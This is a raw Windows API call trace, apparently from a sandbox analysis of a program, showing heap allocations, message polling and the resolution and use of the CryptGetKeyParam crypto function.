0x43ca220 [0098.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0098.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0098.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0098.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0098.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0098.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0098.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0098.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0098.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0098.764] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0098.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0098.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0098.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0098.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0098.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0098.764] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0098.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0098.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0098.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0098.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0098.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0098.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0098.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0098.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0098.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0098.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0098.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0098.765] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0098.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0098.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0098.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0098.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26a0 [0098.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0098.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0098.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0098.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0098.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2f8 [0098.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0098.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0098.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0098.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0098.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0098.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0098.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0098.766] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0098.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0098.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0098.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0098.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0098.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0098.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0098.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0098.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0098.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0098.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0098.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0098.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0098.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0098.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0098.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0098.766] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0098.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0098.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0098.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0098.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0098.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0098.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0098.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0098.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0098.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0098.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0098.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0098.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0098.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0098.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0098.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0098.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0098.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0098.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0098.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0098.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0098.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0098.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0098.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0098.767] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0098.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0098.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0098.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0098.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0098.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0098.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0098.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0098.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0098.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0098.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0098.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0098.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0098.768] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0098.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0098.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca538 [0098.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0098.768] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0098.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0098.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0098.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0098.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0098.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0098.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0098.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0098.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0098.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0098.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0098.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0098.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0098.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0098.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0098.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0098.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0098.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0098.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0098.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0098.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0098.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0098.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0098.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0098.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0098.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0098.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0098.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0098.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0098.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0098.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0098.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0098.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0098.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0098.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0098.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0098.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0098.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0098.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0098.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0098.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0098.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0098.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0098.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0098.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0098.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0098.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0098.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0098.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0098.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0098.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0098.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0098.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0098.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0098.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0098.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0098.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0098.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0098.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0098.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0098.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0098.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0098.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0098.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0098.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0098.771] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0098.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0098.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0098.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0098.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0098.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0098.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0098.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0098.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0098.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0098.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0098.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0098.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0098.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0098.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0098.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0098.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0098.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0098.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0098.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0098.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0098.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0098.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0098.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0098.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0098.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0098.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0098.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0098.773] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0098.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0098.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0098.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0098.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0098.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0098.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0098.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0098.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0098.923] CryptGetKeyParam (in: hKey=0x41ac740, dwParam=0x7, pbData=0x43e28a0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e28a0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0098.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0098.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0098.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0098.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0098.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0098.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0098.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0098.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0098.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0098.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0098.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0098.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0098.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0098.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0098.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0098.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0098.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0098.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0098.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0098.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0098.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0098.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0098.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0098.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0098.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0098.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0098.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0098.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0098.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0098.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0098.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0098.924] HeapFree (in: 